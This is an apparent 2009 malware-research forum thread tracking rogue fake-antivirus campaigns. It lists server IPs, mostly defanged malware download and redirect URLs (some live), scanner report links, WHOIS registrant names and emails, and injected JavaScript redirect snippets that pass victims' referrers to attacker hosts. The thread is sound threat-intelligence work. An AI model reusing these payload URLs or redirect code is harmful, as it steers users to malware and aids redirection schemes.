Anubis (http://anubis.iseclab.org/?action=result&task_id=16d5655fba54d6644c51434d6719507a1)

TCP Connection Attempts:
Quote
72.232.229.50:80

ws.exe
VirusTotal (http://www.virustotal.com/analisis/ddf5308224d4b924b985df7c2a6966b7) - 17/40 (42.5%)

ws.zip
VirusTotal (http://www.virustotal.com/analisis/5ba23916abb0bcc33713572c31006162) - 11/40 (27.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 05, 2009, 01:58:38 am
78.159.115.215
Code: [Select]
hxxp://scanline4.info/download/install.php
hxxp://line4scan.info/download/install.php
Quote
Size:   40448 bytes,
MD5:   d6ae61a866d593b765c1c042c0525509
VirusTotal (http://www.virustotal.com/analisis/94fa4a8c7155c162737f547eb2a1bb32) - 8/40 (20%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1215fa2c7ea1aa5f4b1c66741abfcbd9d)

downloads:
Code: [Select]
hxxp://62.211.68.12/irbray/file.exe
hxxp://62.211.68.12/irbray/InternetAntivirusPro.exe
hxxp://xoomer.virgilio.it/irbray/file.exe
hxxp://xoomer.virgilio.it/irbray/InternetAntivirusPro.exe
hxxp://xoomer.alice.it/irbray/file.exe
http://xoomer.alice.it/irbray/InternetAntivirusPro.exe
VirusTotal (http://www.virustotal.com/analisis/04a0c6af71f5ee0f218761d5cd74e3bc) - 11/40 (27.5%)
VirusTotal (http://www.virustotal.com/analisis/7ce55acb9db85f064036eeead9528a4b) - 4/40 (10%)

94.75.209.11
Fake scanner pages:
Code: [Select]
http://scanner.rapidantivir09.com/33/
http://scanner.rapidantivir09.com/34/
http://scanner.rapidantivir09.com/35/
http://scanner.rapidantivir09.com/36/
http://scanner.rapidantivir09.com/37/
http://scanner.rapidantivir09.com/38/
http://scanner.rapidantivir09.com/39/
http://scanner.rapidantivir09.com/40/
http://scanner.rapidantivir09.com/41/

Redirection with software-traff[.]com/go.php?id=341&ref=1292
Wepawet (http://wepawet.iseclab.org/view.php?hash=b18ee854888e6d7157982901273f9b8b&t=1241483868&type=js)

Code: [Select]
hxxp://scanner.rapidantivir09.com/setup/install.exe
hxxp://scanner.rapidantivir09.com/setup/install_1096_MTI5MnwzNXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
VirusTotal: Trojan Banker (http://www.virustotal.com/analisis/f6e7fcdeb2d074200985a7b1fcb92626) - 26/39 (66.67%)

94.102.48.28
Fake scanner pages:
Code: [Select]
hxxp://virusinfocheck.com/1/?id=11-1&back=%3DzQ0yzT0MgQMMI%3D
hxxp://virusinfocheck.com/2/?id=11-1&back=%3DzQ0yzT0MgQMMI%3D
Payloads:
Code: [Select]
hxxp://virusinfocheck.com/download/Install_11-1.exe
VirusTotal (http://www.virustotal.com/analisis/25b9c330959cfd9102f5a3ff74d3b58d) - 4/40 (10%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=14feff9e5911c6a4455a8f7d3874e4632&format=html)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e35e9965a701378bbfed38f35d2b4a4a)

HTTP Activity:
Quote
securedliveuploads.com:80 [83.133.123.140]
GET /?act=fb&1=0&2=0&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmboc&4=eebajfjafekaifnbddghoclg&5=22&6=1&7=63&8=31&9=0&10=1
Title: Re: Rogue - Fake AV
Post by: SysAdMini on May 05, 2009, 10:01:07 am
209.44.126.102

Code: [Select]
scan4mix.com

Registrant Bill Rader (mapegram@gmail.com)

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 05, 2009, 03:15:29 pm
Redirects to rogue:

hxxp://litefront.cn/in.cgi?9 (not listed)
hxxp://clubmillionswow.cn/in.cgi?9  (not listed)
-->
hxxp://lemmydislikes.com/in.cgi?9
-->
hxxp://goworkscan.com/?uid=12724
-->
hxxp://scan4mix.com/?uid=12724

91.212.41.111
Code: [Select]
hxxp://litefront.cn/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=3c5ac5252cd6d16846411dcf90ef4317&t=1241518643&type=js)

exploit related:
Quote
window.location=encodeURI("
hxxp://va.litefront.cn/in.cgi?9&tsk=id852-31mar09-r200&type=l&seoref="
+encodeURIComponent(document.referrer)
+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="
+encodeURIComponent(document.URL)
+"&default_keyword=XXX
");

91.212.41.96
Code: [Select]
hxxp://clubmillionswow.cn/in.cgi?9
exploit related
Quote
window.location=encodeURI("
hxxp://ap.clubmillionswow.cn/in.cgi?9&tsk=id790-09apr09-r35&type=l&seoref="
+encodeURIComponent(document.referrer)
+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="
+encodeURIComponent(document.URL)
+"&default_keyword=XXX
");
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccccd1393f158462d6fe73f983ba19b8&t=1241519347&type=js)

full injection (Google search) (http://www.google.com/search?source=ig&hl=en&q=%22clubmillionswow.cn%22)

Rogue:
78.159.115.215.internetserviceteam.com
Code: [Select]
hxxp://log4scan.info
hxxp://scan4log.info
hxxp://logscan4.info

Registrant Name:John Aschinger
Registrant Email:plutommy@ gmail.com

209.44.126.102
Code: [Select]
hxxp://scan4zoom.info
Registrant Name:Benn Tinkman
Registrant Email:bnntnkmn@ gmail.com
Code: [Select]
hxxp://scan4ray.com
hxxp://ray4scan.com
Registrant Name:Bill Rader
Registrant Email:mapegram@ gmail.com
VirusTotal (http://www.virustotal.com/analisis/39f5f183d801d69f84a1491d9f391818) - 8/41 (19.51%)

91.212.65.55
Code: [Select]
hxxp://globalsecurityscans.com/download.php
Registrant Name:Raymond Myles
Registrant Email: RaymondCMyles@ text2re.com
VirusTotal (http://www.virustotal.com/analisis/de7b36953c31f4086090ed3cb9e60a7f) - 14/40 (35.00%)

38.99.170.210
Code: [Select]
hxxp://vrusstatuscheck.com/1/?id=11-1
VirusTotal (http://www.virustotal.com/analisis/674a7ca96164adca6f7104740ef2babc) - 8/41 (19.51%)
Registrant Name: Atkinson L Nick
Registrant Email: immigration.beijing@ footer.cn

redirects with
your-guide-online.com
crytheriver.biz
awardspacelooksbig.us
Title: Re: Rogue - Fake AV
Post by: CkreM on May 07, 2009, 02:31:25 am
fake AV:
Code: [Select]
trustedwebsecurity.com
Allowedwebsurfing.com

more on that IP as stated on domain tools but couldn't find them.
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 07, 2009, 02:50:29 am
http://hosts-file.net/pest.asp?show=209.44.126.
Title: Re: Rogue - Fake AV
Post by: CkreM on May 07, 2009, 03:52:44 am
http://hosts-file.net/pest.asp?show=209.44.126.
;D
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 12:11:27 pm
;D go go go

209.44.126.102

Registrant Name:Bernhard Langer
Registrant Email:myscarbe@ gmail.com

atom4scan.info
fan4scan.info
lux4scan.info
mini4scan.info
scan4atom.info
scan4fan.info
scan4mini.info
scan4mix.info
scan4ray.info
scan4star.info

Registrant Name: Carl Marcus
Registrant Email: brmargul@ gmail.com

fanscan4.com
rayscan4.com

Registrant Name: Thomas Fergerson
Registrant Email: telerdomb@ gmail.com

scan6list.com

********************

78.159.115.216

Registrant Name: Thomas Fergerson
Registrant Email: telerdomb@ gmail.com

fuse6scan.com
way6scan.com

Registrant Name: Lois Kiltz
Registrant Email: loiskiltz@ gmail.com

fusescan6.com

Registrant Name:Emile Plaas
Registrant Email:eplaas@ gmail.com

listscan6.info

****************

38.105.19.27

Registrant Name: Lois Kiltz
Registrant Email: loiskiltz@ gmail.com

open6scan.com
scan6fuse.com
scan6open.com

(http://img93.imageshack.us/img93/2710/goscan.jpg)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 01:04:15 pm
69.4.230.204 [iad2-virt5.liquidgravity.com]
78.47.91.153 [static.153.91.47.78.clients.your-server.de]
212.117.165.126
38.99.170.9

Code: [Select]
hxxp://fullantispywarescan.com/1/?id=11-1&smersh=bdf6da8d5&back==TQ1wDT3MUQOMI=N
hxxp://fullantispywarescan.com/download.php?id=11-1
Wepawet (http://wepawet.iseclab.org/view.php?hash=25018b10fde56f3eedfc660e3d80627a&t=1241873146&type=js)
VirusTotal (http://www.virustotal.com/analisis/dc0b3fa70bb28e26746ffbfe804ff0cf) - 7/40 (17.5%)

connection to 83.133.123.140
Quote
hxxp://momentstohaveyou.cn/?act=fb&1=0&2=0&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmboc&4=eebajfjafekaifnbddghoclg&5=22&6=1&7=63&8=31&9=0&10=1
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9c9ccc9da8b1389314f1b29d177e59cd)
http://www.malwaredomainlist.com/mdl.php?search=momentstohaveyou.cn&colsearch=All&quantity=50 (http://www.malwaredomainlist.com/mdl.php?search=momentstohaveyou.cn&colsearch=All&quantity=50)

another on 38.99.170.9 with the same file
Code: [Select]
hxxp://proantivirusscanv3.com
hxxp://proantivirusscanv3.com/1/?id=11-1&smersh=bdf6da8d5&back==jQ01jT4McQMMI=N
hxxp://proantivirusscanv3.com/download.php?id=11-1

Wepawet (http://wepawet.iseclab.org/view.php?hash=1db805d04279e506da74e6183d55ece4&t=1241873009&type=js)
redirection by liveavantbrowser2[.]cn

209.44.126.22
Code: [Select]
hxxp://securityexamination.com
hxxp://securityexamination.com/download.php?affid=00000
hxxp://securityexamination.com/in.php?url=5&affid=00000
Wepawet (http://wepawet.iseclab.org/view.php?hash=70cfc73e817040683aa56c1aa88f3dc0&t=1241755339&type=js)
VirusTotal (http://www.virustotal.com/analisis/e5c4f14a9a46fa3f0b54c8d3fb5a0615) - 17/40 (42.50%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=150a4314291818e64750c1e8e92421d50)

Code: [Select]
hxxp://webbrowsersecurity.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=b8c41a78a4d9ca14d314d80bfe2f2c40&t=1241873976&type=js)

209.44.126.241
Code: [Select]
hxxp://fullvirusprotection.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=1128892f84978a1c80f6f384e5aab015&t=1241830338&type=js)

95.129.144.236
Code: [Select]
hxxp://freewebmypcscan.com
hxxp://freewebmypcscan.com/install.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=28396d5ed27d1248836e63de387748a8&t=1241684545&type=js)
VirusTotal (http://www.virustotal.com/analisis/28d7a81181ccbfdd196d79cb0e0ced2d) - 11/39 (28.21%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fa2223f7b9e02ef4d9e42ac33c8d0030)

connection with 217.112.94.230  [217-112-94-230.static.as29550.net]

Quote
217.112.94.230:80 - [winbestsoftdownload.com] 
Request: GET /winav.exe 
Code: [Select]
hxxp://winbestsoftdownload.com/winav.exe 
 
VirusTotal (http://www.virustotal.com/analisis/802f269926e93a1eeafbf20ca2820ff3) - 10/41 (24.39%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=19021c3b563efce7485110b91b826514e&call=first)

91.212.65.55
Code: [Select]
hxxp://webeyesecurity.com

Fraudulent payment system:
194.165.4.77
Code: [Select]
hxxp://securebill09.com/pp/
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 08:11:52 pm
209.44.126.241

Code: [Select]
hxxp://xvirusdescan.com
hxxp://fullvirusprotection.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=8dd57672c729dcd920ea55b229e2556d&t=1241889688&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1128892f84978a1c80f6f384e5aab015&t=1241830338&type=js)
Title: Re: Rogue - Fake AV
Post by: CkreM on May 10, 2009, 11:40:53 pm
Fake AV:
Code: [Select]
videoporntrue.com/scan/?id=260
winpcdefender09.com
seems like the control panel login or something like that
Code: [Select]
av-cash.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 11, 2009, 03:39:36 am
Fake AV:
Code: [Select]
ia-pro.com
iantivirus-pro.com
iantiviruspro.com
scanfan4.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 11:25:22 am
209.44.126.102

Code: [Select]
mix4scan.info
ray4scan.info
scanatom4.info
scanmini4.info
scanmix4.info
scanray4.info
scanstar4.info
star4scan.info

Registrant Name:Bernhard Langer
Registrant Email:myscarbe@ gmail.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 11:39:19 am
Redirects to Rogue
91.212.41.110
Code: [Select]
hxxp://islandtravet.cn/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=94891451f027edde27292ef96b77770f&t=1241704846&type=js)
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 11, 2009, 11:46:29 am
DD URL's for the one's MWT posted :)

Code: [Select]
http://mix4scan.info/download/install.exe
http://ray4scan.info/download/install.exe
http://scanatom4.info/download/install.exe
http://scanmini4.info/download/install.exe
http://scanmix4.info/download/install.exe
http://scanray4.info/download/install.exe
http://scanstar4.info/download/install.exe
http://star4scan.info/download/install.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 03:49:14 pm
two other redirects:

Code: [Select]
hxxp://yrapyatnica.com/in.cgi?6
hxxp://nextfreedollar.com/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=5dfce7a8e2e25b696ba07d0d1c1031cf&t=1242057348&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3cd653c62f186d10412e048002d15cf6&t=1242055737&type=js)

Domain name: yrapyatnica[.]com
Registrant:
    Sergej Diskov
    Email: unik-k@ mail.ru

Domain name: nextfreedollar[.]com
Registrant:
    Vadim Kamenskij
    Email: vadik523@ mail.ru
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 05:12:08 pm
78.47.91.153 [static.153.91.47.78.clients.your-server.de]
212.117.165.126
38.99.170.9


redirects with liveavantbrowser2[.].cn

Code: [Select]
hxxp://computerscanv1.com/1/?id=11-1&smersh=33a8c6a42&back=%3DTQxyTjwMYQMMI%3DO
hxxp://computerscanv1.com/download.php?id=11-1
VirusTotal (http://www.virustotal.com/analisis/0ccef7ef8bf49b07a47448c01480fef4) - 0/40 (0.00%) !!
Wepawet (http://wepawet.iseclab.org/view.php?hash=1db805d04279e506da74e6183d55ece4&t=1242061730&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1a5a14d03dde85004616e00cbb0cdda31)
connection to  83.133.123.140:80 - [momentstohaveyou.cn]

Registrant: Kayan M Aslan (info@ dmf.com.tr)
Title: Re: Rogue - Fake AV
Post by: CkreM on May 12, 2009, 04:23:41 pm
Fake AV:
Code: [Select]
my-xtube.com/promo3/
free-porn-host.com/promo3/
fuck-me-pumps.com/promo3
hot-tube-tuberzzz.net/promo3/
xmovies-central.com/promo3/
top-porn-tubes.com/promo3/
my-fuck-movies.com/promo3/
youtube-xmovies.com/promo3/
yourporn-xmovies.com/promo3/
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 12, 2009, 04:34:41 pm
http://virusscan.jotti.org/en/scanresult/64ca4b6124c23fcaeaa335a5eccae920ed3b02bf
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 13, 2009, 07:00:17 pm
Rogue
209.44.126.22
Code: [Select]
hxxp://websecuritypolice.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=53991bfa0cda6c879bf65595cdc0bcef&t=1242235516&type=js)
Registrant Name: Dorothy Rodarte
Registrant Email: DorothyDRodarte@ text2re.com

Rogue
209.44.126.102
Code: [Select]
hxxp://rankscan4.info/download/install.php
hxxp://scan4rank.info/download/install.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=f4da94d9f0db6e1ed1260be0075a8d8f&t=1242239109&type=js)
Registrant Name: John Redwine
Registrant Email: mexnacc@ gmail.com

Redirects to Rogue
209.44.126.102
Code: [Select]
hxxp://goscanrank.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=9b624b4ecfdba2a1a71b03e916618b96&t=1242238838&type=js)
Registrant Name: Francesco Carpa
Registrant Email: alcnafuch@gmail .com

Rogue
209.44.126.241
Code: [Select]
hxxp://intellectsecurityshield.com/download.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=5681897bb58fbef190db73f66722b92b&t=1242174215&type=js)
Registrant Name: Buste Ridges
Registrant Email: gregorbentley@ gmail.com
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 13, 2009, 07:14:19 pm
goscanrank.com redirects to;

http://key4scan.info/download/index.php
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 16, 2009, 12:17:33 am
209.44.126.102
Code: [Select]
hxxp://scantop4.com/download/install.php
hxxp://top4scan.com/download/install.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=a66d639c66db4800c5d00bbfd790cd48&t=1242399035&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=a412e5855a008e20186b231e3c859279&t=1242399249&type=js)
Registrant Name: Greg Litton
Registrant Email: ansouthe@ gmail.com

209.44.126.241
Code: [Select]
hxxp://initpcsecurityscan.com/download.php
hxxp://bestwebscantools.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=61e575d65c20e6efca4a12219eadc179&t=1242431132&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=348f60b37d76ef2b119e354d5cc7d93d&t=1242432991&type=js)
WHOIS Privacy Protection

84.16.244.116 [84.16.244.116.internetserviceteam.com]
Code: [Select]
hxxp://zerocleaner.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=f51c573425dd515e6bd470b13730d0aa&t=1242430465&type=js)
WHOIS Privacy Protection

194.165.4.39 (Rogue PrivacyCenter)
Code: [Select]
hxxp://privacy-tools-pack.com/install.exe
hxxp://privacy-center.org/install.exe
hxxp://privacy-centar.org/install.exe
VirusTotal (http://www.virustotal.com/analisis/38a176c40a92a2a3b0c382d133c59cce) - 24/40 (60.00%)

Registrant Name: Artur Polilov
Registrant Email: prv54@ lycos.com

Registrant Name: Artur Maksimov
Registrant Email: contact@ privacy-center.org

Registrant Name: Pavel Antonov
Registrant Email: acapz@ freebbmail.com

194.165.4.39 Malware urls
Code: [Select]
hxxp://privacyupdate447.com/avail
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=242db3b60789080d22fe0f7be32fbfb0)
Registrant Name: Artur Polilov
Registrant Email: prv54@ lycos.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 16, 2009, 06:53:05 pm
209.44.126.22

Code: [Select]
hxxp://superiorinternetsecurity.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=2beffa5dc402aa091fc2c4275d429e38&t=1242500484&type=js)
VirusTotal (http://www.virustotal.com/analisis/0222f1fb178f3c083b83491dedcdec32) - 5/40 (12.5%)

Registrant name: Albert Figler
Registrant email: AlbertPFigler@ text2re.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 18, 2009, 03:57:31 am
Fake AV:
Code: [Select]
tubeonporn09.com/scan/the downloaded file:
Code: [Select]
tubeonporn09.net/codec.exehttp://www.virustotal.com/analisis/598cca0715b74d459973cef0b73b1308
Same file on different domain:
Code: [Select]
rakompoporyadkunazaryadku.com/codec.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 19, 2009, 03:36:31 pm
209.44.126.102

Code: [Select]
hxxp://zone4scan.info/download.php
hxxp://scanzone4.info/download.php
hxxp://zonescan4.info/download.php
hxxp://scan4one.info/download.php
hxxp://scanrank4.info/download.php
hxxp://rank4scan.info/download.php
Registrant: John Redwine / mexnacc@ gmail.com
Code: [Select]
hxxp://scan4gen.com/download.php
hxxp://notescan4.com/download.php
hxxp://note4scan.com/download.php
hxxp://metascan4.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com
Code: [Select]
hxxp://scantop4.info/download.php
hxxp://scan4top.info/download.php
hxxp://topscan4.info/download.php
hxxp://starscan4.info/download.php
hxxp://rayscan4.info/download.php
hxxp://mixscan4.info/download.php
Registrant: Edmund Moss / finewnrk@ gmail.com
Code: [Select]
hxxp://scan4meta.com/download.php
Registrant: Greg Litton / ansouthe@ gmail.com 
VirusTotal (http://www.virustotal.com/analisis/a1772ea28ab9dbfba18ab60f0dd83f16)

209.44.126.103
Code: [Select]
hxxp://genscan4.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com

redirects
209.44.126.103
Code: [Select]
hxxp://goscangen.com
hxxp://goonescan.com
hxxp://gopagescan.com
Registrant: Claudio Canella / tanehen@ gmail.com 
Code: [Select]
hxxp://goscanmany.com
hxxp://goscanzone.com
hxxp://goscanwide.com
Registrant: Gianluce Baruzi / chirelqas@ gmail.com
Code: [Select]
hxxp://goscanone.com
hxxp://goscanpage.com
Registrant: Enrico Schiru / canrcnad@ gmail.com
Code: [Select]
hxxp://gomanyscan.com
hxxp://gowidescan.com
Registrant: Francesco Carpa / alcnafuch@ gmail.com

84.16.244.113 - 84.16.244.113.internetserviceteam.com
Code: [Select]
hxxp://0scan.us/download.php
VirusTotal (http://www.virustotal.com/analisis/f54e334ef43cc78d92eb175c30e8bbd3) - 6/39 (15.38%)
Registrant: James Nitton / uuuuu@ ua.fm

84.16.244.114 - 84.16.244.114.internetserviceteam.com
Code: [Select]
hxxp://internetsafetyscan.com/download.php
VirusTotal (http://www.virustotal.com/analisis/92894fa347a0aea20531a46ef4c23b25) - 7/37 (18.92%)
Registrant: Peter Hicks / PeterJHicks@ text2re.com

66.63.167.50 - 50.167.63.66.oc3networks.com 
Code: [Select]
hxxp://xpsecuritysp3.com
hxxp://xpsecuritycentral.com
hxxp://xpsecurityoffice.com
hxxp://xpsecurityhome.com
Registrant:
Kirill Vlasov / vlasov@ interlayer.net
Kirill Vlasov / vlasov@ interlayer.net
Alexander Zolotov / zolotov@ laptopmix.net
Alexander Zolotov / zolotov@ laptopmix.net

38.99.170.9
Code: [Select]
hxxp://malwareliveproscanv1.com/1/?id=2004&smersh=04ae150da&back=%3DjQ0xjj3MIQNMI%3DN
VirusTotal (http://www.virustotal.com/analisis/e0e6c627ae6417bcf3667b620ec3b50d) - 0/40 (0.00%)
Registrant: Fabian Q Mister / fabian@ ingenovate.com

209.44.126.22
redirects
Code: [Select]
hxxp://securityonlineworld.com/in.php
hxxp://securityonlineworld.com/hitin.php

fake scanner page
Code: [Select]
hxxp://securityonlineworld.com/scan.php
hxxp://securityonlineworld.com/scanonline.php
hxxp://securityonlineworld.com/page.php
hxxp://securityonlineworld.com/page2.php
hxxp://securityonlineworld.com/page3.php

payload
Code: [Select]
hxxp://securityonlineworld.com/download.php

VirusTotal (http://www.virustotal.com/analisis/c0da590a14bb9dac4ddd6d4a8ae45700) - 9/40 (22.5%)
Registrant: Patricia Fields / PatriciaMFields@ text2re.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 19, 2009, 04:47:56 pm
209.44.126.22
Code: [Select]
http://securityonlinedirect.com/download.php
http://securityonlinedirect.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/a4bc00b340855bcebbd1134fc9b23848) - 10/40 (25%)
VirusTotal (http://www.virustotal.com/analisis/160fd610babe1e5530e1286335335d24) - 7/39 (17.95%)
Registrant: Andrew Vadlamudi / AndrewGVadlamudi@ text2re.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 23, 2009, 06:07:21 pm
AS10929 (NETELLIGENT)

209.44.126.22
Code: [Select]
hxxp://webcamsafety.com/download.php
hxxp://webcamsafety.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/59b3c658c4612795702a862e6d44e0d7b0eee83b93e00e5ae53076342689f18a-1243095881) - 5/40 (12.50%)
VirusTotal (http://www.virustotal.com/analisis/e482c46dcd7fdbb62216499673910df822bb1735d8f8793a6fa70d7c0767ee29-1243095882) - 4/35 (11.43%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=18331ed14776995e115a816263126abf&t=1243096404&type=js)
Registrant: Irene Mccord / irene.e.mccord@ trashymail.com

209.44.126.36
Code: [Select]
hxxp://websecuritybasics.com/download.php
hxxp://websecuritybasics.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/60f6d79183e94f1b2c1517239b2a40cd2cc18fc06ae3793258d896f85b55d34f-1243046741) - 8/40 (20.00%)
VirusTotal (http://www.virustotal.com/analisis/843076d02eb0149f2a4e6786a577f92c615f9bdc1b69c09251dbbbf072885783-1243046741) - 8/40 (20.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=557c84a5e43fd99cf8df69a398ff0f5a&t=1243047155&type=js)
Registrant: Joanne Liddell / zozo@ gmail.com

209.44.126.102
Code: [Select]
hxxp://scan4meta.info
hxxp://meta4scan.info
hxxp://metascan4.info
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3555c5af1c134c8ed0fc3d2f2a017b8&t=1243056163&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b25a43a88fe453cd450ff0234f1bbf5f&t=1243056673&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=fcc476116d9d14ed9ecc99107d43ca28&t=1243057736&type=js)
Registrant: Enrico Schiru / canrcnad@ gmail.com
Registrant: Edmund Moss / finewnrk@ gmail.com
Registrant: Edmund Moss / finewnrk@ gmail.com

AS47867 (UKNETCOM)

91.212.132.10
Code: [Select]
hxxp://tubes-host.com/promo1/get.php
hxxp://xtubes-host.com/promo1/get.php
hxxp://xtube-xmovie.com/promo1/get.php

91.212.132.12
Code: [Select]
hxxp://free-antivirus-engine.com/promo1/get.php
hxxp://hot-porn-tubes.com/promo1/get.php
hxxp://my-porn-archive.com/promo1/get.php
hxxp://porn-tubes-world.com/promo1/get.php
hxxp://xmovies-downloads.com/promo1/get.php
hxxp://youporn-for-free.com/promo1/get.php
hxxp://secure-center-antivirus.com/promo1/get.php
fhxxp://ree-porn-xmovies.com/promo1/get.php
hxxp://free-antivirus-tools.com/promo1/get.php
hxxp://free-xtube.com/promo1/get.php
hxxp://fresh-xxx-movies.com/promo1/get.php
VirusTotal (http://www.virustotal.com/analisis/fbe399f81083aee112ececec51a33057) - 13/39 (33.33%)

AS29131 (RAPIDSWITCH)

78.129.166.166
Code: [Select]
hxxp://porn-hub-xmovies.com/promo1/get.php
hxxp://free-xtubes-host.com/promo1/get.php
hxxp://antovirus-pro.com/promo1/get.php
hxxp://antispyware-center.com/promo1/get.php
hxxp://my-xxx-video.com/promo1/get.php
hxxp://xtube-downloads.com/promo1/get.php
hxxp://porn-movies-central.com/promo1/get.php

AS30083 (SERVER4YOU)

69.64.33.242  [air099.startdedicated.com]
Code: [Select]
hxxp://antivirus-cs1.com
hxxp://antivirus-cs2.com
hxxp://antivirus-cs3.com
hxxp://antivirus-cs4.com
hxxp://antivirus-cs5.com
hxxp://antivirus-cs6.com
hxxp://antivirus-cs7.com
hxxp://antivirus-cs8.com
hxxp://antivirus-cs9.com
hxxp://antivirus-cs10.com
hxxp://antivirus-cs11.com
hxxp://antivirus-cs12.com
hxxp://antivirus-cs13.com
hxxp://antivirus-cs14.com
hxxp://antivirus-cs15.com
Registrant: Enrique Perez / webmaster@ software-mall.com

Code: [Select]
hxxp://2009system-cleaner.com
hxxp://advanced-anti-virus.com
hxxp://antimalwarewarrior2009.com
hxxp://antivirusmaster2009.com
hxxp://e-spy-punisher.com
hxxp://killallspywares2009.com
hxxp://malware-preventer.com
hxxp://malware-remover2008.com
hxxp://megantivirus2009.com
hxxp://micro-adware-cops.com
hxxp://micro-antivirus2008.com
hxxp://spy-cops-2009.com
hxxp://spy-re-mover.com
hxxp://superantivirus2009.com
hxxp://sys-antispy2009.com
hxxp://ultimate-anti-virus.com
hxxp://vis-antispy2008.com
hxxp://windows-antispy2008.com
Registrant: Andrey Kozoev / arich3221@ yahoo.com

Code: [Select]
hxxp://antivirus-buy1.com
Registrant: Andrey Kochetkov / arich3221@ yahoo.com

Code: [Select]
hxxp://advanced-antivirus.com
hxxp://antispyware-solutions.com
hxxp://antiviral-softtools.com
hxxp://antivirus-research-lab.com
hxxp://fight-viruses-corp.com
hxxp://kill-adware-soft.com
hxxp://spy-terminators.com
hxxp://spyware-preventer.com
hxxp://spyware-remover-inc.com
Registrant: Private Registration

AS28753 (NETDIRECT)

Fraudulent payment page for Rogue AV
95.168.163.83 [95-168-163-83.rackcorp.com]
Code: [Select]
hxxps://secure.aquabilling.com/payment/?domain=pc-privacydefender.com&aid=pspdapbill&affid=0
Registrant: Live Internet Marketing Limited  / aquabilling.com@ liveinternetmarketingltd.com

Redirects to Rogue:
89.149.210.154  [89-149-210-154.internetserviceteam.com]
Code: [Select]
hxxp://jasovsk.cn/bestway.js
hxxp://sappac.cn/bestway.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=b6cbe6c881c59a1b88714a479e52b6e3&t=1243078138&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=a8970ca2dfe1e3083215f7cb01cb3d6c&t=1243078097&type=js)
Registrant: KuznetsPavel / cndomains@ thirddor.info
Registrant: cndomains@ thirddor.info

Redirects to Rogue Antivirus:
89.149.212.137 [89.149.212.137.internetserviceteam.com]
Code: [Select]
hxxp://yuokqwr.cn/bestway.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=5f34f0eee66a5c099d2b25d326a5813f&t=1243078038&type=js)
Registrant: kanscx@ gmail.com

AS3491 (BTN)

Fraudulent payment page for Rogue AV
209.8.45.124 [209-8-45-124.btnaccess.net]
Code: [Select]
hxxps://secure.pnm-software.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=syssec&&advert=00000
Registrant: Live Internet Marketing Limited / pnm-software.com@ liveinternetmarketingltd.com

Fraudulent payment page for Rogue AV
78.46.216.237 [static.237.216.46.78.clients.your-server.de]
Code: [Select]
